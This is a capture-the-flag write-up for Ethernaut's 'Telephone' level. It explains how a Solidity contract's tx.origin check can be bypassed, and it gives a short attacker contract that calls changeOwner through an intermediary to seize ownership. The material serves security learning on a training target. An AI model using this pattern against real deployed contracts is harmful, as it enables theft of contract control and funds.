Ethernaut - 4.Telephone

Difficulty: 🌕🌑🌑🌑🌑

Claim ownership of the contract below to complete this level.
Things that might help

See the Help page above, section “Beyond the console”

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

Writeup

To complete this level, we need to claim ownership of the contract. The keypoint is the difference between tx.origin and msg.sender.

1. Get new instance
2. Create a contract

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.0;
   
    interface Telephone {
        function changeOwner(address _owner) external;
    }
   
    contract AttackTelephone {
        Telephone public targets = Telephone(YOUR_LEVEL_INSTANCE_ADDRESS);
   
        function attackTelephone() public{
            targets.changeOwner(YOUR_ACCOUNT);
        }
    }
   

3. Compile & deploy .
4. Call attackTelephone function. In this scenario, tx.origin will be the victim’s address while msg.sender will be the malicious contract ( AttackTelephone ) ‘s address. ( tx.origin != msg.sender == true )
5. Callthe method

   
    await contract.owner().then(v => v.toString())
       
   

   to check owner if it is your account.

6. Submit instance ξ( ✿＞◡❛)

Reference

tx.origin vs msg.sender